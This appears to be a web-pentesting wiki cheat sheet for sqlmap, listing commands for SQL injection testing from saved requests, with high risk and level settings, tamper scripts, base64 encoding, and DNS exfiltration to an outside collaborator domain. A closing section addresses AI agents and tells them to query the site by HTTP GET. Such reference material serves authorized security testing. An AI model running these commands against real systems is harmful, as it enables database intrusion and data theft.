# SQLmap

### Documentation

<https://github.com/sqlmapproject/sqlmap/wiki/Usage>

### From Request - HTTP:80

```
sqlmap -r http.request -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

### From Request - HTTPS:443

```
sqlmap -r http.request --force-ssl -p param1 --level=5 --risk=3 --proxy=http://127.0.0.1:8080 
```

or the http.request file needs to have special HTTP header `Host: server:443`

### Batch Silent Mode without questions

```
sqlmap -r http.request --force-ssl --answers="follow=Y" --batch
```

### DNS Collaborator (under root)

Tip: register new HTTP proxy on port 8081 and send all probes from sqlmap to this lister in order filter proxy history based on sqlmap listener.

Use `--dns-domain` switch to instruct nmap use DNS probes against your collaborator server

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8081 --dns-domain e7mxq58krq154r5ka6wess5el5ryfo3d.oastify.com --risk=3 --level=5
```

### Tampering

Tampering scripts for payload encoding using `--tamper` switch.

```
sqlmap -r ./subs.sqli --proxy=http://127.0.0.1:8080 --tamper="charencode" 
```

A list of all existing tampering scripts is available using `--list-tampers` switch or looking at github repository /tamper folder

{% embed url="<https://github.com/sqlmapproject/sqlmap/tree/master/tamper>" %}

### URL target & Parameters

```
sqlmap -u http://domain?id=1 -p id
```

You can read HTTP request from a file addressing payload by asterix symbol (\*).

```javascript
sqlmap -r ./sql.req

# sql.req is the following file containing HTTP request using  asterix () for parameter injection
GET /path/to/username*
Host: servername:port
```

### HTTP Proxy

```
sqlmap --proxy=http://127.0.0.1:8080 
```

### Databases

The most common DBMSs the remaining ones look at [sqlmap wiki --dbms](https://github.com/sqlmapproject/sqlmap/wiki/Usage#force-the-dbms).

```
--dbms=mssql|mysql|postgresql|oracle
```

### Base64 Encoding

By default sqlmap encode values in query string by URL encoding. When you need to encode payload using base64 encoding use the following switch with a parameter name

```
sqlmap -u domain?p1=value --base64=p1
```

### HTTP method - DELETE

```
sqlmap --method=DELETE -u http://domain -p param1
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hackerlab.gitbook.io/wiki.hackerlab.cz/web-pentesting/sqlmap.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.